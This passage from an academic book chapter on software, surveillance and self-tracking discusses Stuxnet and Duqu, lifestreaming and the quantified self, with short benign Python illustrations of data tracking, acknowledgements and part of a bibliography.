**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
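The feedback loop these examples describe can be made concrete with a short sketch. The following is a minimal, illustrative example only - the readings, baseline and framing are invented, not drawn from any of the devices above - in which a week of hypothetical sleep data is reduced to a personal baseline against which the latest reading is compared: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# A minimal sketch of the quantified-self feedback loop: compare the &lt;br /&gt;
# latest reading against a personal baseline. All figures are invented. &lt;br /&gt;
from statistics import mean &lt;br /&gt;
&lt;br /&gt;
sleep_hours = [7.2, 6.8, 7.5, 6.9, 7.1, 6.4, 7.0]  # last seven nights &lt;br /&gt;
baseline = mean(sleep_hours) &lt;br /&gt;
tonight = 5.9 &lt;br /&gt;
&lt;br /&gt;
deviation = tonight - baseline &lt;br /&gt;
print(f'baseline {baseline:.1f}h, tonight {tonight}h, deviation {deviation:+.1f}h') &lt;br /&gt;
# A lifestreaming app would feed this deviation back to the user as a &lt;br /&gt;
# nudge, and upload it for the kind of aggregation described above. &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;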
Lifestreams were originally an idea of David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described a lifestream as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
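Freeman's description translates almost directly into a data structure. The following is a minimal sketch of that abstraction, assuming nothing beyond what the quotation specifies; the operator names and documents are illustrative and are not Freeman's actual implementation: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# A minimal sketch of a lifestream: a time-ordered list of documents &lt;br /&gt;
# plus simple 'store' and 'filter' operators. Illustrative only. &lt;br /&gt;
import datetime &lt;br /&gt;
&lt;br /&gt;
stream = []  # the lifestream, ordered from past (tail) to future &lt;br /&gt;
&lt;br /&gt;
def store(doc, when=None): &lt;br /&gt;
    # Add a document to the stream (the 'store' operator). &lt;br /&gt;
    when = when or datetime.datetime.now() &lt;br /&gt;
    stream.append({'time': when, 'doc': doc}) &lt;br /&gt;
    stream.sort(key=lambda item: item['time']) &lt;br /&gt;
&lt;br /&gt;
def substream(keyword): &lt;br /&gt;
    # Filter the stream on demand (the 'filter/monitor' operators). &lt;br /&gt;
    return [item['doc'] for item in stream if keyword in item['doc']] &lt;br /&gt;
&lt;br /&gt;
store('electronic birth certificate', datetime.datetime(1980, 6, 29)) &lt;br /&gt;
store('email: draft paper in progress') &lt;br /&gt;
store('reminder: submit chapter', datetime.datetime(2013, 1, 1))  # futural &lt;br /&gt;
print(substream('paper')) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;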
Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, with its short, text-message-sized, 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically, starting in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that are common in smartphones, to log GPS location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams, n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
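As a concrete illustration of this encoding, here is a minimal activity in the JSON serialisation outlined by the specification cited above (ActivityStreamsWG, 2011). The field names follow the 1.0 specification; the person, album, identifier and URL are invented for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# A minimal sketch of a JSON Activity Streams 1.0 activity: actor, &lt;br /&gt;
# verb, object and target. Names and URLs are invented. &lt;br /&gt;
import json &lt;br /&gt;
&lt;br /&gt;
activity = { &lt;br /&gt;
    'published': '2012-03-04T15:04:55Z', &lt;br /&gt;
    'actor': {'objectType': 'person', &lt;br /&gt;
              'id': 'acct:geraldine@example.org', &lt;br /&gt;
              'displayName': 'Geraldine'}, &lt;br /&gt;
    'verb': 'post', &lt;br /&gt;
    'object': {'objectType': 'photo', &lt;br /&gt;
               'url': 'http://example.org/photos/1'}, &lt;br /&gt;
    'target': {'objectType': 'photo-album', &lt;br /&gt;
               'displayName': 'Holiday Album'}, &lt;br /&gt;
} &lt;br /&gt;
print(json.dumps(activity, indent=2)) &lt;br /&gt;
# Encoded this way, 'Geraldine posted a photo to her album' can be &lt;br /&gt;
# transmitted, aggregated and searched computationally. &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;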
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and for the organization (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narrative, a stabilising web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software, and the implications for wider study in terms of the research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: both in terms of their passive quality – under the surface, relatively benign and silent – and in terms of their aggressiveness in hoarding data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. Its Latin etymology – closely put, or joined, together – also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation are commonly offloaded to the ‘cloud’ – server computers designed specifically for the task and accessed via networks. Indeed, many viruses seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. 
Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative context to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series-structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this (see the sketch below).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not yet been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
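&lt;br /&gt;
By way of illustration, here is a minimal sketch of the temporal structure just described: the past as stored data, the present as the reading being collected, and the future as a projection held as an updatable code-object. All figures and the (naive) projection rule are invented for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# A minimal sketch of a time-series stream organised as a list, with &lt;br /&gt;
# past, present and future embedded in the code. Figures are invented. &lt;br /&gt;
from statistics import mean &lt;br /&gt;
&lt;br /&gt;
past = [12.0, 12.4, 12.1, 12.6, 12.9]   # archived daily measurements &lt;br /&gt;
present = 13.1                          # the reading just collected &lt;br /&gt;
&lt;br /&gt;
def project(history, steps=3): &lt;br /&gt;
    # Naive projection: extend the mean day-on-day change forward. &lt;br /&gt;
    deltas = [b - a for a, b in zip(history, history[1:])] &lt;br /&gt;
    trend = mean(deltas) &lt;br /&gt;
    return [history[-1] + trend * (i + 1) for i in range(steps)] &lt;br /&gt;
&lt;br /&gt;
past.append(present)          # the present becomes stored past data &lt;br /&gt;
future = project(past)        # the future held as an updatable object &lt;br /&gt;
print(future) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;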
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship (ref: 211106), which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at Unlike Us in March 2012 at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium, organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book; it represents a neuronal frontal portrait of an individual, and more of his excellent work can be seen at [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) '&amp;quot;New Stuxnet&amp;quot; worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
